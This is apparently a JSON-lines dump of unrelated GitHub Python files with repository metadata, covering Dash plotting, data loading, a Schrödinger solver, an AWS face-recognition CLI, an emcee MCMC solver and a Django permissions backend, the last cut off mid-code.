dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport pandas as pd\nimport plotly.graph_objs as go\n\nfrom dash.dependencies import Input, Output\n\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\napp.layout = html.Div(children=[\n html.H1(children='Hello Dash'),\n\n html.Div(children='''\n Dash: A web application framework for Python.\n '''),\n\n dcc.Graph(\n id='example-graph' \n )\n])\n\ndef prepare_chart_bar_data():\n # In real world, below prob done something like...\n # df2018= pd.read_sql('mySQL',db)\n data2018 = [['January', 6], ['February', 7], ['March', 2]] \n data2019 = [['January', 7], ['February', 12], ['March', 5]] \n df2018 = pd.DataFrame(data2018, columns = ['Month', 'SnowDays']) \n df2019 = pd.DataFrame(data2019, columns = ['Month', 'SnowDays']) \n\n # Assemble our list data for graphic, we'll use the plotly graph object \"go\"\n \n bars_data_set_a = {'data':\n [\n {'x': df2018['Month'].tolist(),\n 'y': df2018['SnowDays'].tolist(),\n 'type':'bar',\n 'name':'2018'}\n ]\n }\n\n bars_data_set_b = {'data':\n [\n {'x': df2019['Month'].tolist(),\n 'y': df2019['SnowDays'].tolist(),\n 'type':'bar',\n 'name':'2019'}\n ],\n 'layout': {'title':'visualization'}}\n\n #my_figure_dict = dict(bars_data_set_a, **bars_data_set_b)\n bars_data_set_a.update(bars_data_set_b)\n\n my_figure_dict = bars_data_set_a\n\n return my_figure_dict\n\n\n@app.callback(\n Output('example-graph', 'figure'),\n [Input('example-graph', '')])\ndef update_figure(figure):\n return prepare_chart_bar_data()\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n \n # data': [\n # {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar', 'name': 'SF'},\n # {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'bar', 'name': u'Montréal'},\n # ],\n # 'layout': {\n # 'title': 'Dash Data Visualization'\n\n \n \n # return {\n # 'data': [\n # {'x': df2018['Month'], 'y': df2018['SnowDays'], 'type': 'bar', 'name': '2018'},\n # {'x': df2019['Month'], 'y': df2019['SnowDays'], 'type': 'bar', 'name': '2019'},\n # ],\n # 'layout': {\n # 'title': 'Dash Data Visualization'\n # }\n # }\n\n \n\n\n \n\n","repo_name":"maxrottersman/MaxDashProject","sub_path":"Archived_Experiments/alt_dash_example_01_function_first_3_addmoredataabsraction.py","file_name":"alt_dash_example_01_function_first_3_addmoredataabsraction.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"70635768533","text":"import os\nimport numpy as np\nfrom rich.progress import track\nimport pandas as pd\nfrom visualizers.DataVisualizers import visualize_line\n\ndef run(name, points, runners, generator, tests_per_point=10, ret_data=lambda x, y, z: x,\n data_names=[], x_name=\"X\", output=None, **kwargs):\n res = []\n\n for point in track(np.arange(*points)):\n for i in range(tests_per_point):\n test = generator(point)\n for name, runner in runners.items():\n result = runner(test, **kwargs)\n fix_res = point, *ret_data(result, test, name), name\n\n res.append(fix_res)\n\n\n\n np_arr = np.array(res)\n dataset = pd.DataFrame(np_arr, columns=[x_name, *data_names, \"Runner\"])\n\n for i in data_names: \n visualize_line(f\"{name}: {i}\", x_name, i, dataset, output=output, hue=\"Runner\")\n\n","repo_name":"atrin-hojjat/Uni-AI-Course-Reports","sub_path":"Report 
03/code/tests/TestRunner.py","file_name":"TestRunner.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"11611158114","text":"# 1. opencv >>>> PIL\n#\n# IO cost\n# 1. hdf5, tfrecord (Tensorflow) several small image (text) to a larger file\n# 2. preloader\n# 3. cache (lmdb or redis) key, value cahe\n#\n# pin_memory = True\n\n# tfrecord\nimport tensorflow as tf\nimport os\nfrom PIL import Image\nimport numpy as np\n\ndef _bytes_feature(value):\n \"\"\"Returns a bytes_list from a string / byte.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[tf.io.encode_jpeg(value).numpy()]))\n\ndef _int64_feature(value):\n \"\"\"Returns an int64_list from a bool / enum / int / uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\ndef image_example(image_path, label):\n image_raw = Image.open(image_path)\n image_raw = np.array(image_raw)\n\n feature = {\n 'image': _bytes_feature(image_raw.tobytes()),\n 'label': _int64_feature(label),\n }\n\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\ndef create_tfrecord(output_filename, image_folder):\n writer = tf.io.TFRecordWriter(output_filename)\n\n # Your dataset: list of tuples (image_path, label)\n dataset = [\n (\"path/to/image1.jpg\", 0),\n (\"path/to/image2.jpg\", 1),\n # Add more images and labels as needed\n ]\n\n for image_path, label in dataset:\n tf_example = image_example(image_path, label)\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n# Specify the output TFRecord file and the folder containing images\ntfrecord_filename = 'output.tfrecord'\nimage_folder_path = 'path/to/your/image/folder'\n\n# Create TFRecord file\ncreate_tfrecord(tfrecord_filename, image_folder_path)\n\n# several small images to hdf5 file\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport h5py\nfrom PIL import Image\nimport os\nfrom multiprocessing import Pool\n\nclass CustomDataset(Dataset):\n def __init__(self, root_dir):\n self.root_dir = root_dir\n self.image_paths = [os.path.join(root_dir, file) for file in os.listdir(root_dir) if file.endswith(\".jpg\")]\n self.transform = transforms.Compose([transforms.ToTensor()])\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n image_path = self.image_paths[idx]\n image = Image.open(image_path).convert('RGB')\n image = self.transform(image)\n return image\n\ndef process_images(args):\n idx, image_path = args\n image = Image.open(image_path).convert('RGB')\n image = transforms.ToTensor()(image)\n return idx, image.numpy()\n\ndef convert_to_hdf5_multiprocess(dataset, output_filename='output.h5', num_processes=4):\n with h5py.File(output_filename, 'w') as hdf5_file:\n images_group = hdf5_file.create_group('images')\n\n # Use multiprocessing to parallelize image processing\n with Pool(num_processes) as pool:\n results = pool.map(process_images, enumerate(dataset.image_paths))\n\n for idx, image_data in results:\n images_group.create_dataset(f'image_{idx}', data=image_data)\n\n# Specify the folder containing images\nimage_folder_path = 'path/to/your/image/folder'\n\n# Create a dataset\ndataset = CustomDataset(image_folder_path)\n\n# Convert to HDF5 using multiple processes\nhdf5_filename = 'output.h5'\nconvert_to_hdf5_multiprocess(dataset, hdf5_filename, num_processes=4)\n\n# redis \nimport redis\nfrom PIL import Image\nfrom io import BytesIO\nimport 
base64\n\n# Connect to the Redis server\nredis_client = redis.StrictRedis(host='localhost', port=6379, decode_responses=True)\n\ndef encode_image(image_path):\n with open(image_path, \"rb\") as image_file:\n encoded_image = base64.b64encode(image_file.read()).decode('utf-8')\n return encoded_image\n\ndef decode_image(encoded_image):\n decoded_image = base64.b64decode(encoded_image)\n return Image.open(BytesIO(decoded_image))\n\ndef store_images_in_redis(image_folder):\n # Assuming each image has a unique filename\n image_files = [f for f in os.listdir(image_folder) if f.endswith('.jpg')]\n\n for image_file in image_files:\n image_path = os.path.join(image_folder, image_file)\n encoded_image = encode_image(image_path)\n key = f\"image:{image_file}\"\n redis_client.set(key, encoded_image)\n\ndef retrieve_image_from_redis(image_key, output_path):\n encoded_image = redis_client.get(image_key)\n if encoded_image:\n decoded_image = decode_image(encoded_image)\n decoded_image.save(output_path)\n\n# Specify the folder containing images\nimage_folder_path = 'path/to/your/image/folder'\n\n# Store images in Redis\nstore_images_in_redis(image_folder_path)\n\n# Retrieve an image from Redis (replace 'your_image_key' with an actual key)\nimage_key = 'image:your_image.jpg'\noutput_image_path = 'output_image.jpg'\nretrieve_image_from_redis(image_key, output_image_path)\n\n\n","repo_name":"ChenXie-sci/model_optimization","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17229798699","text":"import pathlib\nfrom .gen_utils import *\nfrom dk2cxx import *\n\n\ndef format_functions_cpp(globals: list[dk2map.Global], blocks: UserBlocks = None):\n def format_cpp_head():\n yield format_middle(f\"warning: file is managed by {pathlib.Path(__file__).name}\")\n yield format_middle(f\"you can edit code only in *_user_code blocks\")\n yield f\"#include \"\n yield empty_line\n yield f\"using namespace dk2;\"\n yield empty_line\n yield f\"#define relink_stub(name) printf(\\\"[fatal]: stub \\\"#name\\\" call\\\\n\\\"); ::abort();\"\n yield empty_line\n yield from map(format_autogen_line, format_cpp_head())\n yield format_block_line(\"head_user_code\")\n if blocks is not None:\n yield from blocks.head\n else:\n yield f\"\"\n yield f\"// user code\"\n yield f\"\"\n yield format_end_of_block_line()\n\n def format_cpp_body():\n yield f\"#pragma optimize( \\\"\\\", off )\"\n for glob in filter(filter_function_var, globals):\n fun_t = glob.type # type: dk2map.FunctionType\n suffix = \" // assembly\" if fun_t.declspec is dk2map.Declspec.Assembly else ''\n # ret = ''\n # if fun_t.ret.kind is dk2map.TypeKind.Ptr:\n # ret = ' return NULL; '\n # elif fun_t.ret.kind is dk2map.TypeKind.Bool:\n # ret = ' return false; '\n # elif fun_t.ret.kind in [\n # dk2map.TypeKind.Int, dk2map.TypeKind.Float,\n # dk2map.TypeKind.Char, dk2map.TypeKind.Winapi\n # ]:\n # ret = ' return 0; '\n name = f\"dk2::{format_function_name(glob.name)}\"\n ret = f\" relink_stub({name}); \"\n yield f\"/*{glob.va:08X}*/ {format_function(fun_t, name)} {{{ret}}}{suffix}\"\n yield empty_line\n yield f\"#pragma optimize( \\\"\\\", on )\"\n yield from map(format_autogen_line, format_cpp_body())\n yield format_block_line(\"tail_user_code\")\n if blocks is not None:\n yield from blocks.tail\n else:\n yield f\"\"\n yield f\"// user code\"\n yield f\"\"\n yield 
format_end_of_block_line()\n\n","repo_name":"DiaLight/Ember","sub_path":"dk2/gen/gen_functions_cpp.py","file_name":"gen_functions_cpp.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"25164537359","text":"from flask import Flask, request, abort\nfrom flask_restful import Resource, Api\nfrom marshmallow import Schema, fields\n\n\nclass BarQuerySchema(Schema):\n key1 = fields.Str(required=True)\n key2 = fields.Str(required=True)\n kucundayu = fields.Int()\n\n\napp = Flask(__name__)\napi = Api(app)\nschema = BarQuerySchema()\n\n\nclass BarAPI(Resource):\n def get(self):\n print(request.args)\n errors = schema.validate(request.args)\n if errors:\n abort(400, str(errors))\n msg = \"OK\"\n #print(request.args['key1'])\n msg += request.args['key1'] + \", \"\n #print(request.args['key1'])\n msg += request.args['key2'] + \", \"\n\n if 'kucundayu' in request.args:\n print(request.args['kucundayu'])\n msg += request.args['kucundayu'] + \", \"\n return msg\n\napi.add_resource(BarAPI, '/bar', endpoint='bar')\n\n# omit of you intend to use `flask run` command\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"CeciliaRuiSun/Asset-Management-Web-App","sub_path":"guide/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2179910509","text":"'''Written by Yinshi Liu'''\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n#define constants\nL = 1*10**(-8)\nm = 9.109*10**(-31)\nsigma = L/25\nkappa = 500/L\nx_0 = L/5\nP = 1024\ndt = 1*10**(-18)\nN = 3000\nh_bar = 1.05*10**(-34)\n\np = np.arange(1, P)\na = L/P\nx = p*a - L/2\npsi = np.zeros(P-1, dtype = \"complex_\")\n\n#normalization constant\npsi_0 = 1/((2*np.pi*sigma**2)**(1/4))\n#initial psi \nfor i in range(1, P-1):\n psi[i] = psi_0 * np.exp(-(x[i]-x_0)**2/(4*sigma**2) + 1j*kappa*x[i])\nprint(psi)\nplt.figure(figsize = (6,4))\nplt.plot(x, psi)\nplt.xlabel('x(m)')\nplt.ylabel('real ψ')\nplt.title('wavefunction ψ at T = 0')\nplt.tight_layout()\nplt.savefig('Fig 1.1.png')\n#define the Hamiltonian\nA = -h_bar**2/(2*m*a**2)\n#V(x) = 0 in potential well\nB = -2*A\nvec_diag = B*np.ones(P-1)\nD = np.diag(vec_diag, k=0)\nsup = A*np.eye(P-1, k = 1)\nsub = A*np.eye(P-1, k = -1)\nH = D + sup + sub\n\n#define time independent matrix L, R\nLeft = np.eye(P-1) + (dt/(2*h_bar))*1j*H\nRight = np.eye(P-1) - (dt/(2*h_bar))*1j*H\n\n#define position and time arrays\ntime = []\nx_exp = []\nprob = []\npsi_total = []\nprob = []\npos = []\nenergy = []\n#begin time steps\ni = 0\nwhile i < 3000:\n #calculate psi(n+1)\n v = np.matmul(Right, psi)\n psi_new = np.linalg.solve(Left, v)\n psi = np.copy(psi_new)\n psi_total.append(psi_new)\n if i == 750:\n plt.figure(figsize = (6,4))\n plt.plot(x, psi)\n plt.xlabel('x(m)')\n plt.ylabel('real ψ')\n plt.title('wavefunction ψ at T = T/4')\n plt.tight_layout()\n plt.savefig('Fig 1.2.png')\n if i == 1500:\n plt.figure(figsize = (6,4))\n plt.plot(x, psi)\n plt.xlabel('x(m)')\n plt.ylabel('real ψ')\n plt.title('wavefunction ψ at T = T/2')\n plt.tight_layout()\n plt.savefig('Fig 1.3.png')\n if i == 2250:\n plt.figure(figsize = (6,4))\n plt.plot(x, psi)\n plt.xlabel('x(m)')\n plt.ylabel('real ψ')\n plt.title('wavefunction ψ at T = 3T/4')\n plt.tight_layout()\n plt.savefig('Fig 1.4.png')\n time.append(i*dt)\n i += 1\nplt.figure(figsize = (6,4))\nplt.plot(x, 
psi)\nplt.xlabel('x(m)')\nplt.ylabel('real ψ')\nplt.title('wavefunction ψ at T = T')\nplt.tight_layout()\nplt.savefig('Fig 1.5.png')\n\n#verify normalization\n#integrate psi*conj(psi) using trap. rule\nfor i in range(len(psi_total)):\n psi_t = psi_total[i]\n psi_magnitude = psi_t*np.conj(psi_t)\n prob.append(np.sum(psi_magnitude)*a)\n#calculate expected value of x\nfor i in range(len(psi_total)):\n psi_t = psi_total[i]\n position = x*psi_t*np.conj(psi_t)\n pos.append(np.sum(position)*a)\n#calculate total energy\nfor i in range(len(psi_total)):\n psi_t = psi_total[i]\n psi_magnitude = psi_t*np.conj(psi_t)\n E = np.matmul(H, psi_magnitude)\n energy.append(np.sum(E*a))\nplt.figure()\nplt.plot(time, prob)\nplt.ylim(0.9, 1.1)\nplt.xlabel('time(s)')\nplt.ylabel('Total Probability')\nplt.title('Normalization of ψ over time')\nplt.savefig('Fig 1.7.png')\n\nplt.figure()\nplt.plot(time, pos)\nplt.xlabel('time(s)')\nplt.ylabel('Expected position')\nplt.title('Expected position over time')\nplt.savefig('Fig 1.6.png')\n\nplt.figure()\nplt.plot(time, energy)\nplt.xlabel('time(s)')\nplt.ylabel('Energy (J)')\nplt.title('Energy conservation over time')\nplt.savefig('Fig 1.8.png')\n","repo_name":"Lenventor/Computation-physics-PHY407","sub_path":"Lab09_TIme-dependent Schrodinger equation (Crank-Nicolson Method).py","file_name":"Lab09_TIme-dependent Schrodinger equation (Crank-Nicolson Method).py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13000620983","text":"import click\nimport botocore, botocore.session\nfrom botocore.exceptions import ClientError\nimport time\nimport cv2\nimport sys\nimport errno\nfrom os import listdir\nfrom os.path import isfile, join\n\nFILE_NAME = 'selfie.png'\n\ndef capture_frame():\n ### Capture image from cam\n camera = cv2.VideoCapture(0)\n time.sleep(0.2) # If you don't wait, the image will be dark\n\n if camera.isOpened(): # try to get the first frame\n rval, frame = camera.read()\n else:\n rval = False\n exit -1\n\n cv2.imwrite(FILE_NAME, frame)\n del(camera) # so that others can use the camera as soon as possible\n\ndef add_face(ctx, file, collection, name):\n session = botocore.session.Session(profile=ctx.obj['PROFILE'])\n\n ### Send to Rekognition to add it to faces collection\n rekognition = session.create_client('rekognition')\n dynamodb = session.create_client('dynamodb')\n\n ### Read image from file system\n with open(file, 'rb') as image:\n response = rekognition.index_faces(\n CollectionId=collection,\n Image={\n 'Bytes': image.read()\n }\n )\n\n ### If successful, add info in DDB\n if len(response['FaceRecords']) > 0:\n ddb_response = dynamodb.put_item(\n TableName=collection,\n Item={\n 'face-id': {\n 'S': response['FaceRecords'][0]['Face']['FaceId'],\n },\n 'name': {\n 'S': name,\n }\n }\n )\n click.secho(\"All done. {} has been successfully added.\".format(name), fg='blue')\n else:\n click.secho(\"Sorry, something went wrong while adding {}. Try again or see an admin for help.\".format(name), fg='yellow')\n\n@click.group()\n@click.option('--profile', metavar='AWS_PROFILE', default='default', envvar='AWS_DEFAULT_PROFILE',\n help='The name of the AWS profile to use. 
You can configure a profile with the AWS CLI command: aws configure --profile .')\n@click.pass_context\ndef cli(ctx, profile):\n \"\"\"TBD\"\"\"\n ctx.obj = {}\n ctx.obj['PROFILE'] = profile\n\n@cli.command()\n@click.option('--collection', prompt='Please enter the collection name', help='Name of the collection to add the faces to')\n@click.option('--path', prompt='Please enter the path to the images', help='Path to a directory containing the faces images')\n@click.pass_context\ndef setup(ctx, collection, path):\n \"\"\"Sets up a collection with faces (pictures) from the local filesystem.\"\"\"\n session = botocore.session.Session(profile=ctx.obj['PROFILE'])\n\n rekognition = session.create_client('rekognition')\n dynamodb = session.create_client('dynamodb')\n\n ### Creates DDB table\n try:\n response = dynamodb.create_table(\n AttributeDefinitions=[\n {\n 'AttributeName': 'face-id',\n 'AttributeType': 'S',\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'face-id',\n 'KeyType': 'HASH',\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 5,\n 'WriteCapacityUnits': 5,\n },\n TableName=collection\n )\n\n click.secho(\"DynamoDB table {} created.\".format(collection), fg='blue')\n except ClientError as e:\n click.secho(\"Sorry, something went wrong: {}. Try again or see an admin for help.\".format(e), fg='yellow')\n\n ### Creates Rekognition collection\n response = rekognition.create_collection(\n CollectionId=collection\n )\n\n if response['StatusCode'] == 200:\n click.secho(\"Collection {} created.\".format(collection), fg='blue')\n else:\n click.secho(\"Sorry, something went wrong. Try again or see an admin for help.\", fg='yellow')\n\n ### Adds faces to collection and info to DDB\n faces = [f for f in listdir(path) if isfile(join(path, f))]\n for face in faces:\n click.secho(\"Working on {}\".format(face), fg='blue')\n try:\n add_face(ctx, join(path, face), collection, face.split('.')[0])\n except IOError as exc:\n if exc.errno != errno.EISDIR: # Do not fail if a directory is found, just ignore it.\n raise # Propagate other kinds of IOError.\n\n@cli.command()\n@click.option('--name', nargs=2, prompt='Please enter the full name', help='Full name of the person being added')\n@click.option('--collection', prompt='Please enter the collection name', help='Name of the collection to add the face to')\n@click.pass_context\ndef add(ctx, name, collection):\n \"\"\"Captures an image from the camera and adds it to the collection.\"\"\"\n ### Capture image from cam\n capture_frame()\n\n ### Send to Rekognition to add it to faces collection\n add_face(ctx, FILE_NAME, collection, name)\n\n\n@cli.command()\n@click.option('--collection', prompt='Please enter the collection name', help='Name of the collection to compare the face to')\n@click.pass_context\ndef capture(ctx, collection):\n \"\"\"Captures an image from the camera and compares it to the faces in the collection.\"\"\"\n session = botocore.session.Session(profile=ctx.obj['PROFILE'])\n ### Capture image from cam\n capture_frame()\n\n ### Send to Rekognition to compare it to faces in collection\n rekognition = session.create_client('rekognition')\n dynamodb = session.create_client('dynamodb')\n\n with open(\"selfie.png\", 'rb') as image:\n response = rekognition.search_faces_by_image(\n CollectionId=collection,\n Image={\n 'Bytes': image.read()\n },\n MaxFaces=1,\n FaceMatchThreshold=80\n )\n\n ### If a match is found, get info from DDB\n if len(response['FaceMatches']) == 1:\n ddb_response = dynamodb.get_item(\n TableName=collection,\n Key={\n 
'face-id': {\n 'S': response['FaceMatches'][0]['Face']['FaceId'],\n }\n }\n )\n click.secho(\"Welcome {}! You can now proceed.\".format(ddb_response['Item']['name']['S']), fg='green')\n else:\n click.secho(\"Sorry, we couldn't recognize you. Try again or see an admin for help.\", fg='yellow')\n","repo_name":"dstroppa/facer","sub_path":"facer.py","file_name":"facer.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35803075785","text":"# standard library imports\nfrom typing import TYPE_CHECKING, Optional\nimport time\nimport random\nimport contextlib\n\n# third party imports\nimport numpy as np\nimport emcee\nimport arviz as az\nfrom loguru import logger\nfrom tabulate import tabulate\n\n# local imports\nfrom probeye.subroutines import pretty_time_delta\nfrom probeye.subroutines import check_for_uninformative_priors\nfrom probeye.inference.scipy.solver import ScipySolver\nfrom probeye.subroutines import stream_to_logger\nfrom probeye.subroutines import print_dict_in_rows\nfrom probeye.subroutines import extract_true_values\n\n# imports only needed for type hints\nif TYPE_CHECKING: # pragma: no cover\n from probeye.definition.inverse_problem import InverseProblem\n\n\nclass EmceeSolver(ScipySolver):\n \"\"\"\n Provides emcee-sampler which is a pure-Python implementation of Goodman & Weare’s\n Affine Invariant Markov chain Monte Carlo (MCMC) Ensemble sampler. For more\n information, check out https://emcee.readthedocs.io/en/stable/.\n\n Parameters\n ----------\n problem\n Describes the inverse problem including e.g. parameters and data.\n seed\n Random state used for random number generation.\n show_progress\n When True, the progress of a solver routine will be shown (for example as a\n progress-bar) if such a feature is available. Otherwise, the progress will\n not be shown.\n \"\"\"\n\n def __init__(\n self,\n problem: \"InverseProblem\",\n seed: Optional[int] = None,\n show_progress: bool = True,\n ):\n logger.debug(f\"Initializing {self.__class__.__name__}\")\n # check that the problem does not contain an uninformative prior\n check_for_uninformative_priors(problem)\n # initialize the scipy-based solver (ScipySolver)\n super().__init__(problem, seed=seed, show_progress=show_progress)\n\n def emcee_summary(\n self, posterior_samples: np.ndarray, true_values: Optional[dict] = None\n ) -> dict:\n \"\"\"\n Computes and prints a summary of the posterior samples containing mean, median,\n standard deviation, 5th percentile and 95th percentile. Note that this method\n was based on code from the taralli package: https://gitlab.com/tno-bim/taralli.\n\n Parameters\n ----------\n posterior_samples\n The generated samples in an array with as many columns as there are latent\n parameters, and n rows, where n = n_chains * n_steps.\n true_values\n True parameter values, if known.\n\n Returns\n -------\n Keys are the different statistics 'mean', 'median', 'sd' (standard\n deviation), 'q05' and 'q95' (0.05- and 0.95-quantile). 
The values are\n dictionaries with the parameter names as keys and the respective statistics\n as values.\n \"\"\"\n\n # used for the names in the first column\n var_names = self.problem.get_theta_names(tex=False, components=True)\n\n # compute some stats for each column (i.e., each parameter)\n mean = np.mean(posterior_samples, axis=0)\n quantiles = np.quantile(posterior_samples, [0.50, 0.05, 0.95], axis=0)\n median = quantiles[0, :]\n quantile_05 = quantiles[1, :]\n quantile_95 = quantiles[2, :]\n\n # compute the sample standard deviations for each parameter\n cov_matrix = np.atleast_2d(np.cov(posterior_samples.T))\n sd = np.sqrt(np.diag(cov_matrix))\n\n # assemble the summary array\n if true_values:\n col_names = [\"\", \"true\", \"mean\", \"median\", \"sd\", \"5%\", \"95%\"]\n true = extract_true_values(true_values, var_names)\n row_names = np.array(var_names)\n tab = np.hstack(\n (\n row_names.reshape(-1, 1),\n true.reshape(-1, 1),\n mean.reshape(-1, 1),\n median.reshape(-1, 1),\n sd.reshape(-1, 1),\n quantile_05.reshape(-1, 1),\n quantile_95.reshape(-1, 1),\n )\n )\n\n # print the generated table, and return a summary dict for later use\n print(tabulate(tab, headers=col_names, floatfmt=\".2f\"))\n return {\n \"true\": {name: val for name, val in zip(row_names, true)},\n \"mean\": {name: val for name, val in zip(row_names, mean)},\n \"median\": {name: val for name, val in zip(row_names, median)},\n \"sd\": {name: val for name, val in zip(row_names, sd)},\n \"q05\": {name: val for name, val in zip(row_names, quantile_05)},\n \"q95\": {name: val for name, val in zip(row_names, quantile_95)},\n }\n else:\n col_names = [\"\", \"mean\", \"median\", \"sd\", \"5%\", \"95%\"]\n row_names = np.array(var_names)\n tab = np.hstack(\n (\n row_names.reshape(-1, 1),\n mean.reshape(-1, 1),\n median.reshape(-1, 1),\n sd.reshape(-1, 1),\n quantile_05.reshape(-1, 1),\n quantile_95.reshape(-1, 1),\n )\n )\n\n # print the generated table, and return a summary dict for later use\n print(tabulate(tab, headers=col_names, floatfmt=\".2f\"))\n return {\n \"mean\": {name: val for name, val in zip(row_names, mean)},\n \"median\": {name: val for name, val in zip(row_names, median)},\n \"sd\": {name: val for name, val in zip(row_names, sd)},\n \"q05\": {name: val for name, val in zip(row_names, quantile_05)},\n \"q95\": {name: val for name, val in zip(row_names, quantile_95)},\n }\n\n def run(\n self,\n n_walkers: int = 20,\n n_steps: int = 1000,\n n_initial_steps: int = 100,\n true_values: Optional[dict] = None,\n **kwargs,\n ) -> az.data.inference_data.InferenceData:\n \"\"\"\n Runs the emcee-sampler for the InverseProblem the EmceeSolver was initialized\n with and returns the results as an arviz InferenceData obj.\n\n Parameters\n ----------\n n_walkers\n Number of walkers used by the estimator.\n n_steps\n Number of steps to run.\n n_initial_steps\n Number of steps for initial (burn-in) sampling.\n true_values\n True parameter values, if known.\n kwargs\n Additional key-word arguments channeled to emcee.EnsembleSampler.\n\n Returns\n -------\n inference_data\n Contains the results of the sampling procedure.\n \"\"\"\n\n # log which solver is used\n logger.info(\n f\"Solving problem using emcee sampler with {n_initial_steps} + {n_steps} \"\n f\"samples and {n_walkers} walkers\"\n )\n if kwargs:\n logger.info(\"Additional options:\")\n print_dict_in_rows(kwargs, printer=logger.info)\n else:\n logger.info(\"No additional options specified\")\n\n # draw initial samples from the parameter's priors\n 
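# note: the loop below draws one independent prior sample per walker for every latent parameter, so the initial ensemble starts spread over the prior support rather than clustered at a single point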
logger.debug(\"Drawing initial samples\")\n if self.seed is not None:\n np.random.seed(self.seed)\n sampling_initial_positions = np.zeros(\n (n_walkers, self.problem.n_latent_prms_dim)\n )\n theta_names = self.problem.get_theta_names(tex=False, components=False)\n for parameter_name in theta_names:\n idx = self.problem.parameters[parameter_name].index\n idx_end = self.problem.parameters[parameter_name].index_end\n samples = self.sample_from_prior(parameter_name, n_walkers)\n if (idx_end - idx) == 1:\n sampling_initial_positions[:, idx] = samples\n else:\n sampling_initial_positions[:, idx:idx_end] = samples\n\n # The following code is based on taralli and merely adjusted to the variables\n # in the probeye setup; see https://gitlab.com/tno-bim/taralli\n\n # ............................................................................ #\n # Pre-process #\n # ............................................................................ #\n\n def logprob(x):\n # Skip loglikelihood evaluation if logprior is equal\n # to negative infinity\n logprior = self.logprior(x)\n if logprior == -np.inf:\n return logprior\n\n # Otherwise return logprior + loglikelihood\n return logprior + self.loglike(x)\n\n logger.debug(\"Setting up EnsembleSampler\")\n sampler = emcee.EnsembleSampler(\n nwalkers=n_walkers,\n ndim=self.problem.n_latent_prms_dim,\n log_prob_fn=logprob,\n **kwargs,\n )\n\n if self.seed is not None:\n random.seed(self.seed)\n sampler.random_state = np.random.mtrand.RandomState(self.seed)\n\n # ............................................................................ #\n # Initial sampling, burn-in: used to avoid a poor starting point #\n # ............................................................................ #\n\n logger.debug(\"Starting sampling (initial + main)\")\n start = time.time()\n state = sampler.run_mcmc(\n initial_state=sampling_initial_positions,\n nsteps=n_initial_steps,\n progress=self.show_progress,\n )\n sampler.reset()\n\n # ............................................................................ #\n # Sampling of the posterior #\n # ............................................................................ 
#\n sampler.run_mcmc(\n initial_state=state, nsteps=n_steps, progress=self.show_progress\n )\n end = time.time()\n runtime_str = pretty_time_delta(end - start)\n logger.info(\n f\"Sampling of the posterior distribution completed: {n_steps} steps and \"\n f\"{n_walkers} walkers.\"\n )\n logger.info(f\"Total run-time (including initial sampling): {runtime_str}.\")\n logger.info(\"\")\n logger.info(\"Summary of sampling results (emcee)\")\n posterior_samples = sampler.get_chain(flat=True)\n with contextlib.redirect_stdout(stream_to_logger(\"INFO\")): # type: ignore\n self.summary = self.emcee_summary(\n posterior_samples, true_values=true_values\n )\n logger.info(\"\") # empty line for visual buffer\n self.raw_results = sampler\n\n # translate the results to a common data structure and return it\n var_names = self.problem.get_theta_names(tex=True, components=True)\n inference_data = az.from_emcee(sampler, var_names=var_names)\n return inference_data\n","repo_name":"BAMresearch/probeye","sub_path":"probeye/inference/emcee/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":10995,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"20750269076","text":"n = int(input())\narr = [list(map(int, input().split())) for _ in range(n)]\narr.sort(key = lambda x : x[0])\n\ndp = [0] * len(arr)\ndp[0] = 1\nfor i in range(1, len(dp)):\n max_num = 0\n for j in range(0, i):\n if arr[j][1] < arr[i][1]:\n max_num = max(max_num, dp[j])\n dp[i] = max_num + 1\n\nprint(len(dp)-max(dp))","repo_name":"jongbin26/coding_test","sub_path":"python/2565.py","file_name":"2565.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10325728306","text":"from django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.models import Permission\nfrom django.db.models import Q, Exists, OuterRef\nfrom ..models.archive import Archive\n\nclass ArchiveBackend(ModelBackend):\n def get_group_permissions(self, user_obj, obj=None):\n perm_cache = super().get_group_permissions(user_obj, obj)\n group_perms = Permission.objects.filter(\n archivegrouppermission__group__user__id=user_obj.id,\n content_type__app_label='archive',\n )\n group_perms = group_perms.values_list(\n 'content_type__app_label',\n 'archivegrouppermission__archive__slug',\n 'codename',\n ).order_by()\n perm_cache = 